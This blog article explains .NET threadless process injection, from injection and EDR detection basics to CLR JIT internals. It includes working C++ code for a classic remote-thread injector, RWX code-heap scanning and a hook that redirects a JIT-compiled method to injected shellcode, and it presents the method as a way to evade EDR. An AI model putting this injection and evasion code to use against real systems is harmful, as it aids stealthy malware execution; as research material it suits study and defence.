.NET Threadless Process Injection

Daniel Santos
7 min read · Feb 18, 2024

Disclaimers

  • The technique described in this article is heavily based on Adam Chester's (@_xpn_) “Weird Ways to Run Unmanaged Code in .NET” article.
  • The article is divided into sections. If you are already familiar with the foundations of process injection and the Microsoft .NET CLR, you can skip the 101 sections.

Process Injection 101

Process injection is the set of techniques used to run arbitrary code in the context of a live target process. The target process must already exist when the injector process runs. This makes process injection different from process spawning, where the injector process needs to create a new sacrificial process to perform the code injection.

But why do threat actors and Red Team operators rely on process injection? A few reasons come to mind: running malicious code in the context of a benign target process provides stability, evasion, and covertness. If your code is unstable and may crash, it's better to lose a random running process than your main command and control agent (stability). Some environments also exclude a few processes from real-time security scanning, so using those processes as proxies increases the chances of going undetected (evasion). Moreover, if your operation is ever manually reviewed by a forensic analyst, it's better to have svchost.exe behaving oddly than YourNotoriouslyMaliciousProgram.exe (covertness).

Classic process injection usually happens in three stages: allocation, writing/transfer, and execution. In the allocation phase, the injector process must create or find some space in the target's memory to store the code it intends to execute. VirtualAllocEx and NtMapViewOfSection are examples of Windows API calls commonly used for allocation. Code caves are also used in the allocation phase. Code caves are memory regions allocated by the target process itself during its regular flow of execution. These are usually read/write/execute (RWX) memory regions that the injector can use to store arbitrary code. The caveat of using code caves is stability. The injector needs to understand how the target process uses these memory regions so it doesn't overwrite some critical structure and cause the target process to crash unexpectedly. Therefore, injection techniques that rely on code caves are either destructive (they sacrifice the target process) or target-specific.

The writing/transfer phase is where the injector will effectively write the code into the memory region mapped during the allocation stage. WriteProcessMemory is an example of a Windows API call commonly used for writing to a target’s memory.

The last stage of a classic process injection chain is execution. As the name implies, this is where the injected code is finally executed. CreateRemoteThread and NtQueueApcThread are examples of Windows API calls commonly used for execution.
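
To make the three stages concrete, here is a minimal, hedged C++ sketch of the classic chain against an arbitrary PID. The payload is a harmless placeholder (a single ret) and error handling is stripped down; the API sequence (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread) is exactly the pattern described above.

```cpp
// Minimal sketch of the classic allocate/write/execute chain (illustration only).
#include <windows.h>
#include <cstdio>
#include <cstdlib>

int main(int argc, char** argv)
{
    if (argc < 2) { printf("usage: %s <pid>\n", argv[0]); return 1; }
    DWORD pid = strtoul(argv[1], nullptr, 10);
    unsigned char shellcode[] = { 0xC3 };          // placeholder payload: ret

    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!hProc) return 1;

    // 1. Allocation: carve out executable memory in the target.
    LPVOID remote = VirtualAllocEx(hProc, nullptr, sizeof(shellcode),
                                   MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!remote) return 1;

    // 2. Writing/transfer: copy the payload into the remote allocation.
    WriteProcessMemory(hProc, remote, shellcode, sizeof(shellcode), nullptr);

    // 3. Execution: start a remote thread at the payload's entry point.
    HANDLE hThread = CreateRemoteThread(hProc, nullptr, 0,
                                        (LPTHREAD_START_ROUTINE)remote,
                                        nullptr, 0, nullptr);
    if (hThread) CloseHandle(hThread);
    CloseHandle(hProc);
    return 0;
}
```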

The SafeBreach Labs folks did an amazing job with their “Process Injection Techniques — Gotta Catch Them All” talk, properly defining process injection and going over the different available techniques.

Detection 101

Modern EDR tools use a combination of API hooks, Event Tracing for Windows (ETW), and kernel callbacks to detect malicious behavior.

API hooking is a technique where the normal flow of execution in a program is intercepted. EDR tools use API hooks to monitor and log calls to critical system APIs that malware often uses. For example, an EDR tool might hook functions related to process creation, file operations, and network connections.
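
As a rough illustration of the interception idea (not how any particular EDR implements it), the sketch below redirects the current executable's own import table entry for CreateFileW to a logging wrapper. Real products typically use inline hooks inside ntdll.dll instead, but the effect is the same: the monitored call passes through the vendor's code first. Function and variable names here are my own.

```cpp
// Hedged sketch: user-mode API interception via an IAT hook (x64, illustration only).
#include <windows.h>
#include <cstdio>
#include <cstring>

static decltype(&CreateFileW) g_realCreateFileW = nullptr;

static HANDLE WINAPI HookedCreateFileW(LPCWSTR name, DWORD access, DWORD share,
                                       LPSECURITY_ATTRIBUTES sa, DWORD disp,
                                       DWORD flags, HANDLE tmpl)
{
    wprintf(L"[hook] CreateFileW(%s)\n", name);   // telemetry point
    return g_realCreateFileW(name, access, share, sa, disp, flags, tmpl);
}

static void InstallIatHook()
{
    BYTE* base = (BYTE*)GetModuleHandleW(nullptr);
    auto dos  = (PIMAGE_DOS_HEADER)base;
    auto nt   = (PIMAGE_NT_HEADERS)(base + dos->e_lfanew);
    auto dir  = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    auto desc = (PIMAGE_IMPORT_DESCRIPTOR)(base + dir.VirtualAddress);

    for (; desc->Name; desc++) {
        if (_stricmp((char*)(base + desc->Name), "kernel32.dll") != 0) continue;
        auto names = (PIMAGE_THUNK_DATA)(base + desc->OriginalFirstThunk);
        auto iat   = (PIMAGE_THUNK_DATA)(base + desc->FirstThunk);
        for (; names->u1.AddressOfData; names++, iat++) {
            if (names->u1.Ordinal & IMAGE_ORDINAL_FLAG) continue;
            auto imp = (PIMAGE_IMPORT_BY_NAME)(base + names->u1.AddressOfData);
            if (strcmp(imp->Name, "CreateFileW") != 0) continue;
            DWORD old;
            VirtualProtect(&iat->u1.Function, sizeof(ULONG_PTR), PAGE_READWRITE, &old);
            g_realCreateFileW = (decltype(&CreateFileW))iat->u1.Function;
            iat->u1.Function  = (ULONG_PTR)HookedCreateFileW;  // redirect the import
            VirtualProtect(&iat->u1.Function, sizeof(ULONG_PTR), old, &old);
            return;
        }
    }
}

int wmain()
{
    InstallIatHook();
    // This call is now routed through HookedCreateFileW before reaching kernel32.
    HANDLE h = CreateFileW(L"C:\\Windows\\win.ini", GENERIC_READ,
                           FILE_SHARE_READ, nullptr, OPEN_EXISTING, 0, nullptr);
    if (h != INVALID_HANDLE_VALUE) CloseHandle(h);
    return 0;
}
```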

ETW is a tracing facility provided by Windows that allows collecting and logging detailed event information from both user-mode applications and kernel-mode drivers. EDR tools use ETW to subscribe to event channels and capture telemetry about system behavior in real time. ETW can provide information about file system activity, process life cycle events, network traffic, etc.
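
For a feel of what consuming ETW telemetry looks like, here is a hedged sketch of a real-time consumer that enables the Microsoft-Windows-Kernel-Process provider (the GUID below is the commonly documented one; verify it on your system). It must run elevated, and a real sensor would decode event payloads rather than just print IDs.

```cpp
// Hedged sketch of a real-time ETW consumer for process telemetry (run elevated).
#include <windows.h>
#include <evntrace.h>
#include <evntcons.h>
#include <cstdio>
#include <cstdlib>

#pragma comment(lib, "advapi32.lib")

// {22FB2CD6-0E7B-422B-A0C7-2FAD1FD0E716} -- Microsoft-Windows-Kernel-Process (verify locally)
static const GUID kKernelProcessProvider =
    { 0x22fb2cd6, 0x0e7b, 0x422b, { 0xa0, 0xc7, 0x2f, 0xad, 0x1f, 0xd0, 0xe7, 0x16 } };

static void WINAPI OnEvent(PEVENT_RECORD rec)
{
    // Event IDs map to process start/stop, thread start/stop, image load, etc.
    wprintf(L"event id=%u from pid=%u\n",
            rec->EventHeader.EventDescriptor.Id,
            rec->EventHeader.ProcessId);
}

int wmain()
{
    WCHAR sessionName[] = L"DemoProcSession";   // arbitrary session name
    ULONG size = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(sessionName);
    auto props = (EVENT_TRACE_PROPERTIES*)calloc(1, size);
    props->Wnode.BufferSize    = size;
    props->Wnode.Flags         = WNODE_FLAG_TRACED_GUID;
    props->Wnode.ClientContext = 1;             // QPC timestamps
    props->LogFileMode         = EVENT_TRACE_REAL_TIME_MODE;
    props->LoggerNameOffset    = sizeof(EVENT_TRACE_PROPERTIES);

    TRACEHANDLE session = 0;
    if (StartTraceW(&session, sessionName, props) != ERROR_SUCCESS) return 1;

    // Subscribe the session to the provider (all keywords, informational level).
    EnableTraceEx2(session, &kKernelProcessProvider,
                   EVENT_CONTROL_CODE_ENABLE_PROVIDER,
                   TRACE_LEVEL_INFORMATION, ~0ULL, 0, 0, nullptr);

    // Open the session as a real-time consumer and pump events.
    EVENT_TRACE_LOGFILEW logfile = {};
    logfile.LoggerName          = sessionName;
    logfile.ProcessTraceMode    = PROCESS_TRACE_MODE_REAL_TIME |
                                  PROCESS_TRACE_MODE_EVENT_RECORD;
    logfile.EventRecordCallback = OnEvent;
    TRACEHANDLE consumer = OpenTraceW(&logfile);
    ProcessTrace(&consumer, 1, nullptr, nullptr); // blocks until the session stops

    ControlTraceW(session, sessionName, props, EVENT_TRACE_CONTROL_STOP);
    free(props);
    return 0;
}
```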

Kernel callbacks are mechanisms that allow a kernel-mode component, like a driver, to be notified when certain system activities occur. EDR tools often include kernel components that register callbacks for various system activities, such as process/thread creation and termination, image (executable) loading, registry operations, etc.
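
A minimal kernel-mode sketch of the process-creation callback primitive follows. It is an illustration, not a hardened component: build it as a WDK driver project, and note that PsSetCreateProcessNotifyRoutineEx requires the driver image to be linked with /INTEGRITYCHECK.

```cpp
// Hedged sketch of a kernel callback for process creation/termination.
#include <ntddk.h>

static void ProcessNotify(PEPROCESS Process, HANDLE ProcessId,
                          PPS_CREATE_NOTIFY_INFO CreateInfo)
{
    UNREFERENCED_PARAMETER(Process);
    if (CreateInfo != nullptr) {   // non-NULL means process creation
        DbgPrint("[callback] pid %u created: %wZ\n",
                 (ULONG)(ULONG_PTR)ProcessId, CreateInfo->ImageFileName);
        // An EDR would inspect CreateInfo->CommandLine, the parent process, etc.,
        // and could block the creation by setting CreateInfo->CreationStatus.
    } else {
        DbgPrint("[callback] pid %u exited\n", (ULONG)(ULONG_PTR)ProcessId);
    }
}

static void DriverUnload(PDRIVER_OBJECT DriverObject)
{
    UNREFERENCED_PARAMETER(DriverObject);
    PsSetCreateProcessNotifyRoutineEx(ProcessNotify, TRUE);   // TRUE = remove
}

extern "C" NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    UNREFERENCED_PARAMETER(RegistryPath);
    DriverObject->DriverUnload = DriverUnload;
    return PsSetCreateProcessNotifyRoutineEx(ProcessNotify, FALSE); // FALSE = register
}
```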

Using the mechanisms described above, EDR tools detect process injection techniques by identifying their patterns. In a nutshell, every time a sequence of API calls that matches the allocate/write/execute pattern against a single target process is detected, the EDR will take action.

Modern process injection techniques focus on shortening the classic process injection chain by eliminating the need for at least one of its stages. Alon Leviev's PoolParty and Ceri Coburn's Threadless Process Injection are examples of process injection techniques that eliminate the need for an explicit execution call. By removing one of the three classic phases, these modern techniques force EDR tool designers either to rely on signature-specific detections or to accept higher false positive rates by acting on signals weaker than a complete injection chain.

.NET CLR 101

The .NET Common Language Runtime (CLR) is the virtual machine responsible for loading and executing .NET binaries. The CLR provides a series of services to a running .NET program, such as thread and memory management, security checks, garbage collection, and Just-in-Time (JIT) compilation. When a standard .NET executable is compiled and run, the first thing to get executed is a stub responsible for loading the CLR. The rest of the program's code is available as Microsoft Intermediate Language (MSIL) chunks, which are compiled as needed by the CLR's JIT compiler. When a method is first invoked, a stub routine is called to compile the method's MSIL body into machine code. Once the method is compiled, the CLR replaces the stub with a jump to its native version, so the next time the method is called there is no need to compile it again.

Every object type is associated with a MethodTable structure. Each method has an associated method descriptor (MethodDesc) and a slot that holds the method's entry point. The slot lives either in the MethodTable or in the MethodDesc itself; its location is determined by the mdcHasNonVtableSlot (0x8) bit in the MethodDesc classification flags.

MethodDesc depiction
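
The sketch below shows how an injector could, in principle, resolve a method's slot address from a MethodDesc read out of the target. The struct layout mirrors one CLR version and is an assumption on my part; offsets vary between runtime versions, so real tooling should resolve them against the actual target runtime. The methodTableSlotArray parameter is a hypothetical pointer the caller has already resolved.

```cpp
// Hedged sketch: locating a method's slot from a remote MethodDesc (assumed layout).
#include <windows.h>
#include <cstdint>

constexpr uint16_t mdcHasNonVtableSlot = 0x0008;   // classification flag (per the article)

#pragma pack(push, 1)
struct MethodDescShim {            // first 8 bytes of MethodDesc (assumption)
    uint16_t flags3AndTokenRemainder;
    uint8_t  chunkIndex;
    uint8_t  flags2;
    uint16_t slotNumber;           // index into the MethodTable slot array
    uint16_t flags;                // classification flags, incl. mdcHasNonVtableSlot
};
#pragma pack(pop)

// Returns the address (in the target process) of the slot holding the
// method's entry point, or 0 on failure. Simplified: ignores slot chunk indirection.
uintptr_t GetSlotAddress(HANDLE hProc, uintptr_t methodDesc, uintptr_t methodTableSlotArray)
{
    MethodDescShim md{};
    if (!ReadProcessMemory(hProc, (LPCVOID)methodDesc, &md, sizeof(md), nullptr))
        return 0;

    if (md.flags & mdcHasNonVtableSlot)
        // Slot is stored inside the MethodDesc itself, right after the base fields.
        return methodDesc + sizeof(MethodDescShim);

    // Otherwise the slot lives in the MethodTable's slot array.
    return methodTableSlotArray + (uintptr_t)md.slotNumber * sizeof(uintptr_t);
}
```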

The CLR's Code Manager is responsible for keeping track of JIT-compiled methods and where they are stored in memory. It does this through a set of specialized JIT managers (JitManager). Each JitManager handles methods of a given CodeType and can map a method body back to its MethodDesc. Currently, three classes implement the IJitManager interface:

  • EEJitManager for JIT-compiled code generated by clrjit.dll.
  • NativeImageJitManager for code pre-compiled with NGEN.
  • ReadyToRunJitManager for version-resilient ReadyToRun code.

The remainder of this article focuses solely on the EEJitManager.

When an MSIL method is compiled, its native version is stored in a code heap (CodeHeap). A CodeHeap is an abstraction the JitManager uses to allocate the memory needed for storing a JIT-compiled method. The CodeHeap works together with the HeapList to manage a contiguous block of memory. The EEJitManager uses a LoaderCodeHeap as its code heap. The LoaderCodeHeap is mapped to an RWX memory region.
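
Because the LoaderCodeHeap ends up as committed private RWX memory, a first reconnaissance step can be as simple as walking the target's address space, as in the hedged sketch below. Mapping a candidate region back to the EEJitManager's code heap still requires walking the CLR structures (HeapList, CodeHeap) described above, which is what CLRInjector does.

```cpp
// Hedged sketch: enumerate committed private RWX regions in a target process;
// on a typical .NET process the JIT code heaps show up among these candidates.
#include <windows.h>
#include <cstdio>
#include <cstdlib>

int wmain(int argc, wchar_t** argv)
{
    if (argc < 2) { wprintf(L"usage: %s <pid>\n", argv[0]); return 1; }
    DWORD pid = wcstoul(argv[1], nullptr, 10);

    HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid);
    if (!hProc) return 1;

    MEMORY_BASIC_INFORMATION mbi;
    for (BYTE* addr = nullptr;
         VirtualQueryEx(hProc, addr, &mbi, sizeof(mbi)) == sizeof(mbi);
         addr = (BYTE*)mbi.BaseAddress + mbi.RegionSize)
    {
        if (mbi.State == MEM_COMMIT &&
            mbi.Type == MEM_PRIVATE &&
            mbi.Protect == PAGE_EXECUTE_READWRITE)
        {
            wprintf(L"candidate code heap: %p (%zu bytes)\n",
                    mbi.BaseAddress, mbi.RegionSize);
        }
    }
    CloseHandle(hProc);
    return 0;
}
```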

.NET CLR Threadless Injection

Threadless injection techniques remove the explicit execution step of the classic process injection chain. Therefore, they are harder to detect through generic behavior analysis engines. Code caves are RWX memory regions allocated by a live process during its normal execution flow. Code caves can be used to eliminate the need for an allocation step during process injection. However, code caves are expected to be used by the target process. Thus, injecting shellcode in a code cave will likely crash the target process or require specific knowledge about the target’s inner workings.

What if there were a class of processes with consistent code caves that behave according to a known pattern? Moreover, what if there were a way to control the target's flow by manipulating writable structures? The result would be a process injection technique that not only skips the allocation and execution steps but also doesn't require any memory protection changes.

.NET processes check all of these boxes. The JIT compiler has to allocate RWX memory regions (code heaps) to host its compiled methods. Moreover, the method tables and associated slots that point to methods in these code heaps are writable, since the CLR has to manipulate them at run time.

How can this .NET-specific process injection be accomplished then? Here is the strategy:

  • Find JIT-compiled methods and choose a target for hooking
  • Allocate the shellcode in the LoaderCodeHeap
  • Update the LoaderCodeHeap allocation pointer so the shellcode is not overwritten by future allocations
  • Hook the JIT-compiled target method (a rough sketch of this step follows the list)
  • Wait for the method to be executed
  • Restore the target method to its original state (unhook)
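
For illustration, here is a hedged sketch of the hook step only (x64). It assumes the method's native entry point and the shellcode address inside the code heap have already been resolved by walking the CLR structures described earlier; the saved bytes are what the unhook step later restores. Since the code heap is already RWX, a plain write is enough: no allocation, no protection change, and no new thread.

```cpp
// Hedged sketch of the hook step: overwrite a JIT-compiled method's entry point
// with an absolute jump to shellcode already placed in the same code heap.
#include <windows.h>
#include <cstring>

// x64 absolute jump: mov rax, imm64 ; jmp rax
bool HookJitMethod(HANDLE hProc, void* methodEntry, void* shellcodeAddr,
                   unsigned char (&savedBytes)[12])
{
    unsigned char jmpStub[12] = { 0x48, 0xB8,             // mov rax, imm64
                                  0, 0, 0, 0, 0, 0, 0, 0, // imm64 (patched below)
                                  0xFF, 0xE0 };           // jmp rax
    memcpy(&jmpStub[2], &shellcodeAddr, sizeof(void*));

    // Save the original prologue so the method can be restored (unhooked) later.
    if (!ReadProcessMemory(hProc, methodEntry, savedBytes, sizeof(savedBytes), nullptr))
        return false;

    // The code heap is already RWX, so no VirtualAllocEx, VirtualProtectEx,
    // or CreateRemoteThread is needed.
    return WriteProcessMemory(hProc, methodEntry, jmpStub, sizeof(jmpStub), nullptr) != 0;
}
```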

All of these steps can be performed using my CLRInjector tool (https://github.com/bananabr/CLRInjector).

CLRInjector usage example

I never took the time to check how the tool does against EDR engines other than Microsoft Defender. Any feedback regarding this is much appreciated.
